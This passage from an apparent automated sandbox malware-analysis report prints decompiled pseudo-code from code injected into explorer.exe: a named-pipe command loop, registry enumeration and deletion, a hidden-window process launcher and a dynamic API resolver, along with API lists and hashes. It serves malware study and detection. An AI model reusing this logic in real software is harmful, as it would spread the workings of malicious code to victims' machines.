                  														_push(_v620 & 0x0000ffff);
                  														_push(_v632);
                  														_push( &_v572);
                  														_t200 =  *0x9e688; // 0xb0000
                  														__eflags = _t200 + 0x1020;
                  														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
                  														E000885D5( &_v636);
                  														E0008A911(_t333, 0, 0xbb8, 1);
                  														E0008861A( &_v632, 0xfffffffe);
                  														_t339 = _t339 + 0x44;
                  													}
                  													E0008861A( &_v616, 0xfffffffe);
                  													_pop(_t262);
                  												}
                  											}
                  										}
                  										goto L36;
                  									}
                  									__eflags = _t262 - 2;
                  									if(_t262 != 2) {
                  										goto L36;
                  									}
                  									E000849A5();
                  									asm("stosd");
                  									asm("stosd");
                  									asm("stosd");
                  									asm("stosd");
                  									_t211 =  *0x9e684; // 0x40f8f0
                  									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                  									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                  									_v628 = _t215;
                  									_t277 = 0x3c;
                  									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                  									_t249 = E00088604(0x1000);
                  									_v624 = _t249;
                  									_pop(_t278);
                  									__eflags = _t249;
                  									if(_t249 != 0) {
                  										_t220 = E000895E1(_t278, 0x32d);
                  										_t280 =  *0x9e688; // 0xb0000
                  										_push(_t280 + 0x228);
                  										_t282 = 0x3c;
                  										_v636 = _t220;
                  										_push(_v628 % _t282 & 0x0000ffff);
                  										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                  										E000885D5( &_v636);
                  										E0008A911(_t249, 0, 0xbb8, 1);
                  										E0008861A( &_v624, 0xfffffffe);
                  									}
                  									goto L41;
                  								}
                  							}
                  						} else {
                  							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                  							__eflags = _t238 - _t246;
                  							if(_t238 == _t246) {
                  								goto L17;
                  							}
                  							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                  							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                  								L36:
                  								_t144 = E000895E1(_t262, 0x610);
                  								_push(0);
                  								_push(_t144);
                  								_v616 = _t144;
                  								_t145 =  *0x9e688; // 0xb0000
                  								_t329 = E000892E5(_t145 + 0x228);
                  								_v612 = _t329;
                  								__eflags = _t329;
                  								if(_t329 != 0) {
                  									_t160 = E0008B269(_t329);
                  									__eflags = _t160;
                  									if(_t160 != 0) {
                  										_t163 =  *0x9e684; // 0x40f8f0
                  										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                  									}
                  									E0008861A( &_v612, 0xfffffffe);
                  								}
                  								E000885D5( &_v616);
                  								_t150 =  *0x9e688; // 0xb0000
                  								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
                  								_t153 =  *0x9e688; // 0xb0000
                  								_t154 = _t153 + 0x228;
                  								__eflags = _t154;
                  								lstrcpynW(_t154,  *0x9e738, 0x105);
                  								_t331 =  *0x9e688; // 0xb0000
                  								_t117 = _t331 + 0x228; // 0xb0228
                  								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
                  								E0008861A(0x9e740, 0xfffffffe);
                  								E0008861A(0x9e738, 0xfffffffe);
                  								L41:
                  								_t159 = 0;
                  								__eflags = 0;
                  								L42:
                  								return _t159;
                  							}
                  							__eflags = _t238 - 2;
                  							if(_t238 != 2) {
                  								goto L36;
                  							}
                  							goto L17;
                  						}
                  					}
                  					L8:
                  					_t159 = _t122 | 0xffffffff;
                  					goto L42;
                  				}
                  				_t250 = E000895C7(0x6e2);
                  				_v616 = _t250;
                  				_t326 = E000895C7(0x9f5);
                  				_v612 = _t326;
                  				if(_t250 != 0 && _t326 != 0) {
                  					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                  						_v620 = 1;
                  					}
                  					E000885C2( &_v616);
                  					_t122 = E000885C2( &_v612);
                  					_t351 = _v620;
                  					if(_v620 != 0) {
                  						goto L8;
                  					}
                  				}
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                  • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                  • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleModulelstrcpyn
                  • String ID:
                  • API String ID: 3430401031-0
                  • Opcode ID: 4700341317bb6675a2e7e2d61b09a23cd5aef0fc5211034b5ecb0d42b3f5b290
                  • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                  • Opcode Fuzzy Hash: 4700341317bb6675a2e7e2d61b09a23cd5aef0fc5211034b5ecb0d42b3f5b290
                  • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E000832A1() {
                  				char _v8;
                  				struct _OVERLAPPED* _v12;
                  				struct _OVERLAPPED* _v16;
                  				intOrPtr* _v20;
                  				char _v24;
                  				intOrPtr _v32;
                  				signed int _v36;
                  				intOrPtr* _v40;
                  				char _v168;
                  				char _v172;
                  				intOrPtr _t41;
                  				void* _t47;
                  				char _t54;
                  				char _t61;
                  				intOrPtr _t64;
                  				void* _t65;
                  				void* _t68;
                  				void* _t70;
                  				void* _t72;
                  				void* _t76;
                  				struct _OVERLAPPED* _t82;
                  				intOrPtr* _t83;
                  				signed int _t84;
                  				signed short* _t86;
                  				intOrPtr* _t97;
                  				signed short* _t105;
                  				void* _t107;
                  				void* _t108;
                  				void* _t109;
                  				intOrPtr* _t112;
                  				struct _OVERLAPPED* _t113;
                  				char _t114;
                  				void* _t115;
                  
                  				_t113 = 0;
                  				_t82 = 0;
                  				_v8 = 0;
                  				_v12 = 0;
                  				while(1) {
                  					_v16 = _t113;
                  					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
                  						break;
                  					}
                  					_push(_t113);
                  					_push( &_v16);
                  					_t41 =  *0x9e684; // 0x40f8f0
                  					_push(0x80000);
                  					_push( *0x9e724);
                  					_push( *0x9e674);
                  					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
                  						GetLastError();
                  					} else {
                  						_t86 =  *0x9e724; // 0x1430020
                  						_t47 = ( *_t86 & 0x0000ffff) - 1;
                  						if(_t47 == 0) {
                  							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
                  							_v40 = _t112;
                  							if(_t112 != 0) {
                  								_t114 = _v24;
                  								if(_t114 <= 1) {
                  									_t113 = 0;
                  									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
                  									_t115 = _t115 + 0x10;
                  									_v172 = _t54;
                  								} else {
                  									_v36 = _t114 - 1;
                  									_t83 = E00088604(_t114 - 1 << 2);
                  									_v32 = _t83;
                  									if(_t83 == 0) {
                  										_t113 = 0;
                  									} else {
                  										if(_t114 > 1) {
                  											_v20 = _t83;
                  											_t84 = 1;
                  											do {
                  												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
                  												_t97 = _v20;
                  												_t84 = _t84 + 1;
                  												 *_t97 = _t64;
                  												_v20 = _t97 + 4;
                  											} while (_t84 < _t114);
                  											_t83 = _v32;
                  										}
                  										_t113 = 0;
                  										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
                  										_t115 = _t115 + 0x10;
                  										_v172 = _t61;
                  										E000894B7( &_v24);
                  									}
                  									_t82 = _v12;
                  								}
                  							}
                  							_t105 =  *0x9e724; // 0x1430020
                  							E000896CA( &_v168,  &(_t105[4]), 0x80);
                  							_push(0x84);
                  							_push( &_v172);
                  							_push(2);
                  							goto L33;
                  						} else {
                  							_t65 = _t47 - 3;
                  							if(_t65 == 0) {
                  								_push(_t113);
                  								_push(_t113);
                  								_t108 = 5;
                  								E0008C319(_t108);
                  								 *0x9e758 = 1;
                  								_t82 = 1;
                  								_v12 = 1;
                  							} else {
                  								_t68 = _t65;
                  								if(_t68 == 0) {
                  									_t70 = E0008F79F( &_v8);
                  									goto L13;
                  								} else {
                  									_t72 = _t68 - 1;
                  									if(_t72 == 0) {
                  										E0008F79F( &_v8);
                  										goto L16;
                  									} else {
                  										_t76 = _t72 - 1;
                  										if(_t76 == 0) {
                  											_t70 = E0008F7C1( &_v8);
                  											L13:
                  											if(_t70 == 0) {
                  												_push(_t113);
                  												_push(_t113);
                  												_push(0xa);
                  											} else {
                  												_push(_v8);
                  												_push(_t70);
                  												_push(5);
                  											}
                  											_pop(_t109);
                  											E0008C319(_t109);
                  										} else {
                  											if(_t76 == 1) {
                  												E0008F7C1( &_v8);
                  												L16:
                  												_push(4);
                  												_push( &_v8);
                  												_push(5);
                  												L33:
                  												_pop(_t107);
                  												E0008C319(_t107);
                  												_t115 = _t115 + 0xc;
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  					DisconnectNamedPipe( *0x9e674);
                  					if(_t82 == 0) {
                  						continue;
                  					}
                  					break;
                  				}
                  				return 0;
                  			}

                  APIs
                  • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
                  • GetLastError.KERNEL32 ref: 000832D0
                    • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(000001F8), ref: 0008C35F
                  • DisconnectNamedPipe.KERNEL32 ref: 000834B4
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                  • String ID:
                  • API String ID: 2389948835-0
                  • Opcode ID: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                  • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
                  • Opcode Fuzzy Hash: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                  • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 434 861b4-861f9 memset call 88604 437 861ff-86211 call 88604 434->437 438 86363-86369 434->438 437->438 441 86217-86234 RegOpenKeyExW 437->441 442 8623a-8626d 441->442 443 86333-86337 441->443 448 8627f-86284 442->448 449 8626f-8627a 442->449 444 86339-8633e 443->444 445 86344-86360 call 8861a * 2 443->445 444->445 445->438 448->443 451 8628a 448->451 449->443 454 8628d-862dc memset * 2 451->454 457 862de-862ee 454->457 458 86326-8632d 454->458 460 862f0-86304 457->460 461 86323 457->461 458->443 458->454 460->461 463 86306-86313 call 8c392 460->463 461->458 466 8631c-8631e call 8b1b1 463->466 467 86315-86317 463->467 466->461 467->466
                  C-Code - Quality: 80%
                  			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                  				void* _v8;
                  				int _v12;
                  				int _v16;
                  				int _v20;
                  				char _v24;
                  				char _v28;
                  				void* _v32;
                  				void* _v36;
                  				char _v40;
                  				char _v44;
                  				char _v48;
                  				char _v56;
                  				void _v576;
                  				intOrPtr _t63;
                  				intOrPtr _t72;
                  				intOrPtr _t80;
                  				intOrPtr _t81;
                  				intOrPtr _t82;
                  				signed int _t85;
                  				intOrPtr _t87;
                  				int _t89;
                  				intOrPtr _t90;
                  				intOrPtr _t92;
                  				void* _t96;
                  				void* _t97;
                  				void* _t98;
                  				void* _t99;
                  				void* _t100;
                  				void* _t108;
                  
                  				_t108 = __fp0;
                  				_t96 = __edx;
                  				_t89 = 0;
                  				_v8 = 0;
                  				memset( &_v576, 0, 0x208);
                  				_v28 = 0x104;
                  				_v20 = 0x3fff;
                  				_v16 = 0;
                  				_t98 = E00088604(0x3fff);
                  				_t100 = _t99 + 0x10;
                  				_v32 = _t98;
                  				if(_t98 == 0) {
                  					L18:
                  					return 0;
                  				}
                  				_t97 = E00088604(0x800);
                  				_v36 = _t97;
                  				if(_t97 == 0) {
                  					goto L18;
                  				}
                  				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                  					L15:
                  					if(_v8 != 0) {
                  						_t63 =  *0x9e68c; // 0x40fab8
                  						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
                  					}
                  					E0008861A( &_v32, 0x3fff);
                  					E0008861A( &_v36, 0x800);
                  					goto L18;
                  				}
                  				_push( &_v56);
                  				_push( &_v40);
                  				_push( &_v44);
                  				_push( &_v48);
                  				_push( &_v24);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push( &_v28);
                  				_push( &_v576);
                  				_t72 =  *0x9e68c; // 0x40fab8
                  				_push(_v8);
                  				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                  					__eflags = _v24;
                  					if(_v24 == 0) {
                  						goto L15;
                  					}
                  					_v12 = 0;
                  					do {
                  						memset(_t97, 0, 0x800);
                  						memset(_t98, 0, 0x3fff);
                  						_t100 = _t100 + 0x18;
                  						_v20 = 0x3fff;
                  						_v16 = 0x800;
                  						 *_t98 = 0;
                  						_t80 =  *0x9e68c; // 0x40fab8
                  						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                  						__eflags = _t81;
                  						if(_t81 == 0) {
                  							_t82 =  *0x9e690; // 0x40fb90
                  							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                  							__eflags = _t90;
                  							if(_t90 != 0) {
                  								_t92 =  *0x9e68c; // 0x40fab8
                  								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                  								__eflags = _a16;
                  								if(_a16 != 0) {
                  									_t85 = E0008C392(_t90);
                  									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                  									if(__eflags == 0) {
                  										__eflags = 0;
                  										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                  									}
                  									E0008B1B1(_t90, _t96, __eflags, _t108);
                  								}
                  							}
                  							_t89 = _v12;
                  						}
                  						_t89 = _t89 + 1;
                  						_v12 = _t89;
                  						__eflags = _t89 - _v24;
                  					} while (_t89 < _v24);
                  					goto L15;
                  				}
                  				_t87 =  *0x9e68c; // 0x40fab8
                  				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                  				goto L15;
                  			}

                  APIs
                  • memset.MSVCRT ref: 000861D2
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                  • memset.MSVCRT ref: 00086295
                  • memset.MSVCRT ref: 000862A2
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$AllocateHeapOpen
                  • String ID:
                  • API String ID: 2508404634-0
                  • Opcode ID: c23eb431959997662d303becb5b7ae0a239f8e9a3a34986d6a64dad737d24dea
                  • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                  • Opcode Fuzzy Hash: c23eb431959997662d303becb5b7ae0a239f8e9a3a34986d6a64dad737d24dea
                  • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 469 8a911-8a941 memset 470 8a94c-8a971 CreateProcessW 469->470 471 8a943-8a948 469->471 472 8a9ae 470->472 473 8a973-8a976 470->473 471->470 474 8a9b0-8a9b6 472->474 475 8a978-8a988 473->475 476 8a996-8a9a6 CloseHandle 473->476 475->476 479 8a98a-8a990 GetExitCodeProcess 475->479 477 8a9ac 476->477 477->474 479->476
                  C-Code - Quality: 65%
                  			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
                  				struct _PROCESS_INFORMATION _v20;
                  				struct _STARTUPINFOW _v92;
                  				signed int _t24;
                  				intOrPtr _t32;
                  				intOrPtr _t34;
                  				int _t42;
                  				WCHAR* _t44;
                  
                  				_t42 = 0x44;
                  				memset( &_v92, 0, _t42);
                  				_v92.cb = _t42;
                  				asm("stosd");
                  				_t44 = 1;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t24 = _a16;
                  				if(_t24 != 0) {
                  					_v92.dwFlags = 1;
                  					_v92.wShowWindow = 0;
                  				}
                  				asm("sbb eax, eax");
                  				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
                  					_t44 = 0;
                  				} else {
                  					if(_a8 != 0) {
                  						_push(_a12);
                  						_t34 =  *0x9e684; // 0x40f8f0
                  						_push(_v20.hProcess);
                  						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
                  							GetExitCodeProcess(_v20.hProcess, _a8);
                  						}
                  					}
                  					CloseHandle(_v20.hThread);
                  					_t32 =  *0x9e684; // 0x40f8f0
                  					 *((intOrPtr*)(_t32 + 0x30))(_v20);
                  				}
                  				return _t44;
                  			}

                  APIs
                  • memset.MSVCRT ref: 0008A925
                  • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
                  • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 0008A990
                  • CloseHandle.KERNELBASE(?), ref: 0008A99E
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Process$CloseCodeCreateExitHandlememset
                  • String ID:
                  • API String ID: 2668540068-0
                  • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                  • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
                  • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                  • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 480 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 483 8b07c-8b07e 480->483 484 8b0ab-8b0dd call 8c392 lstrcpynW 483->484 485 8b080-8b094 call 8bb8d 483->485 485->484 489 8b096-8b0a7 485->489 489->484
                  C-Code - Quality: 87%
                  			E0008B012(void* __ecx, WCHAR* __edx) {
                  				int _v8;
                  				void _v528;
                  				char _v1046;
                  				void _v1048;
                  				intOrPtr _t21;
                  				intOrPtr* _t26;
                  				void* _t27;
                  				intOrPtr _t33;
                  				intOrPtr _t36;
                  				void* _t39;
                  				intOrPtr _t40;
                  				WCHAR* _t47;
                  				void* _t49;
                  
                  				_t39 = __ecx;
                  				_v8 = 0x104;
                  				_t47 = __edx;
                  				memset( &_v1048, 0, 0x208);
                  				memset( &_v528, 0, 0x208);
                  				_t21 =  *0x9e698; // 0x40fbc8
                  				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
                  				_t49 = E0008B946(_t39);
                  				_t26 =  *0x9e6b8; // 0x40fbd8
                  				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
                  				if(_t27 == 0) {
                  					_t33 =  *0x9e688; // 0xb0000
                  					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
                  						_t36 =  *0x9e698; // 0x40fbc8
                  						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
                  					}
                  				}
                  				_t40 =  *0x9e684; // 0x40f8f0
                  				 *((intOrPtr*)(_t40 + 0x30))(_t49);
                  				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
                  				return 1;
                  			}

                  APIs
                  • memset.MSVCRT ref: 0008B037
                  • memset.MSVCRT ref: 0008B045
                  • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
                    • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
                    • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
                    • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
                  • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                  • String ID:
                  • API String ID: 3158470084-0
                  • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                  • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
                  • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                  • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 492 8bf37-8bf66 RegOpenKeyExW 493 8bf68-8bf6a 492->493 494 8bf6c-8bf8a RegQueryValueExW 492->494 495 8bfda-8bfdc 493->495 496 8bf8c-8bf9c call 88604 494->496 497 8bfc7-8bfca 494->497 496->497 503 8bf9e-8bfb8 RegQueryValueExW 496->503 499 8bfcc-8bfd1 497->499 500 8bfd7 497->500 499->500 501 8bfd9 500->501 501->495 504 8bfba-8bfc6 call 8861a 503->504 505 8bfdd-8bfea RegCloseKey 503->505 504->497 505->501
                  C-Code - Quality: 100%
                  			E0008BF37(short* __edx, short* _a4) {
                  				void* _v8;
                  				int _v12;
                  				int _v16;
                  				char* _v20;
                  				char* _t30;
                  				intOrPtr _t31;
                  				char* _t49;
                  
                  				_v16 = 0;
                  				_v12 = 0;
                  				_v8 = 0;
                  				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
                  					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                  						L6:
                  						if(_v8 != 0) {
                  							_t31 =  *0x9e68c; // 0x40fab8
                  							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
                  						}
                  						_t30 = 0;
                  						L9:
                  						return _t30;
                  					}
                  					_t49 = E00088604(_v12);
                  					_v20 = _t49;
                  					if(_t49 == 0) {
                  						goto L6;
                  					}
                  					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
                  						RegCloseKey(_v8);
                  						_t30 = _t49;
                  						goto L9;
                  					}
                  					E0008861A( &_v20, 0xfffffffe);
                  					goto L6;
                  				}
                  				return 0;
                  			}

                  APIs
                  • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
                  • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
                  • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
                  • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: 01e05b04571f0131e572c1f06dd854ee0ee8cafdd31eb164378ba48f19f2f3a3
                  • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
                  • Opcode Fuzzy Hash: 01e05b04571f0131e572c1f06dd854ee0ee8cafdd31eb164378ba48f19f2f3a3
                  • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 508 8be9b-8bec3 RegOpenKeyExA 509 8bec9-8bee6 RegQueryValueExA 508->509 510 8bec5-8bec7 508->510 512 8bee8-8bef7 call 88604 509->512 513 8bf21-8bf24 509->513 511 8bf33-8bf36 510->511 512->513 518 8bef9-8bf13 RegQueryValueExA 512->518 514 8bf31 513->514 515 8bf26-8bf2e RegCloseKey 513->515 514->511 515->514 518->513 519 8bf15-8bf1a 518->519 519->513 520 8bf1c-8bf1f 519->520 520->513
                  C-Code - Quality: 100%
                  			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
                  				void* _v8;
                  				int _v12;
                  				int _v16;
                  				intOrPtr* _t43;
                  				char* _t46;
                  
                  				_t46 = 0;
                  				_v8 = 0;
                  				_v16 = 0;
                  				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
                  					return 0;
                  				}
                  				_v12 = 0;
                  				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
                  					_t46 = E00088604(_v12 + 1);
                  					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
                  						_t43 = _a12;
                  						if(_t43 != 0) {
                  							 *_t43 = _v12;
                  						}
                  					}
                  				}
                  				if(_v8 != 0) {
                  					RegCloseKey(_v8);
                  				}
                  				return _t46;
                  			}









                  APIs
                  • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,0040FC08,00000000,?,00000002), ref: 0008BEBE
                  • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
                  • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
                  • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                  • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
                  • Opcode Fuzzy Hash: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                  • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 521 8dfad-8dfc4 522 8e021 521->522 523 8dfc6-8dfee 521->523 524 8e023-8e027 522->524 523->522 525 8dff0-8e013 call 8c379 call 8d400 523->525 530 8e028-8e03f 525->530 531 8e015-8e01f 525->531 532 8e041-8e049 530->532 533 8e095-8e097 530->533 531->522 531->525 532->533 534 8e04b 532->534 533->524 535 8e04d-8e053 534->535 536 8e063-8e074 535->536 537 8e055-8e057 535->537 539 8e079-8e085 LoadLibraryA 536->539 540 8e076-8e077 536->540 537->536 538 8e059-8e061 537->538 538->535 538->536 539->522 541 8e087-8e091 GetProcAddress 539->541 540->539 541->522 542 8e093 541->542 542->524
                  C-Code - Quality: 100%
                  			E0008DFAD(void* __ecx, intOrPtr __edx) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				char _v92;
                  				intOrPtr _t41;
                  				signed int _t47;
                  				signed int _t49;
                  				signed int _t51;
                  				void* _t56;
                  				struct HINSTANCE__* _t58;
                  				_Unknown_base(*)()* _t59;
                  				intOrPtr _t60;
                  				void* _t62;
                  				intOrPtr _t63;
                  				void* _t69;
                  				char _t70;
                  				void* _t75;
                  				CHAR* _t80;
                  				void* _t82;
                  
                  				_t75 = __ecx;
                  				_v12 = __edx;
